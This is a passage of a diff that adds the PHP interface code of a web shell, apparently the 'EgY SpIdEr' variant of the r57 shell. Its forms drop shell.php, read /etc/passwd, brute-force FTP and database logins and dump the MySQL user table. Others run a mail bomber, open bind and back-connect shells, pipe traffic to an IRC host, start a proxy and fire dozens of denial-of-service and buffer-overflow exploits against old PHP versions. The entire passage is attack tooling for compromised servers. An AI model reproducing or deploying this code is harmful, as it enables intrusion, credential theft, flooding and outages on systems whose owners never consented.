phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts; +echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text65']." 
".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts; +echo "<tr><td valign=top width=70%>".$ts; +echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); +echo $te."</td><td valign=top width=30%>".$ts; +echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe); +echo $te."</td></tr>"; +echo $te.'</div>'.$table_end1; +} + +{ +echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts; +echo "<tr><td valign=top width=70%>".$ts; +echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); +echo $te."</td><td valign=top width=30%>".$ts; +echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe); +echo $te."</td></tr>"; +echo $te.'</div>'.$table_end1; +} + +echo $fs.$table_up1.div_title($lang[$language.'_text171'],'id98200').$table_up2.div('id98200').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_5_2_3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +{ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo 
$table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts; +echo "<tr><td valign=top width=50%>".$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,'')); +echo $te."</td><td valign=top width=50%>".$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,'')); +echo 
sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,'')); +echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td></tr>"; +echo $te.'</div>'.$table_end1.$fe; +} + + +{ + echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts; + echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); + echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); + echo $te.'</div>'.$table_end1.$fe; +} + +echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' 
'.$arh); +echo $te.'</div>'.$table_end1.$fe; + +{ +echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts; + +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir)); +echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']); +echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root")))); +echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic')))); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com")))); +echo 
sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); + +echo $te."</td>".$fe."</tr></div></table>"; +} + + +{ +echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana 
size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from egy spider shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' 
'.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>'); +echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10))); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); + +echo $te."</td>".$fe."</tr></div></table>"; +} + + +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option value=MySQL>MySQL</option>'; +if($mssql_on) $select .= '<option value=MSSQL>MSSQL</option>'; +if($pg_on) $select .= '<option value=PostgreSQL>PostgreSQL</option>'; +if($ora_on) $select .= '<option value=Oracle>Oracle</option>'; +if($mysqli_on) $select .= '<option value=MySQLi>MySQLi</option>'; +if($msql_on) $select .= '<option value=mSQL>mSQL</option>'; +if($sqlite_on) $select .= '<option value=SQLite>SQLite</option>'; +$select .= '</select>'; + +echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up3.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center 
id='n'>".$lang[$language.'_text134']."</div></b></font>"; + +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute')); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']); +echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']); +echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root")))); +echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic')))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; + +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' 
<b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; + +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' 
<b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>"; + +echo "</td>".$fe."</tr></div></table>"; +} + + +{ +echo $table_up1.div_title($lang[$language.'_text81'],'id555555').$table_up2.div('id555555').$ts."<tr>".$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? 
(getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo $table_up1.div_title($lang[$language.'_text81'],'id5525555').$table_up2.div('id5525555').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo 
sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port1',35,'9999').ws(4).in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe."</tr></div></table>"; + +echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe); +echo $te."</td><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 
64b[unserialize()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe); +echo $te."</td><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF 
mSQL [msql_connect](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe); +echo $te."</td><td valign=top width=25%>".$ts; +echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>"; +echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos39').in('submit','submit',0,'BoF [printf()](PHP<5.2.5) and prior').$fe); +echo sr(10,"",$fs.in('hidden','cmd',0,'dos40').in('submit','submit',0,'BoF [mssql_connect(), mssql_pconnect()](PHP<4.4.6) and prior').$fe); +/*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/ +echo $te."</td></tr></div></table>"; +echo $fs.$table_up1.div_title($lang[$language.'_text211'],'id11111').$table_up2.div('id11111').$ts; +echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'.htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); 
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
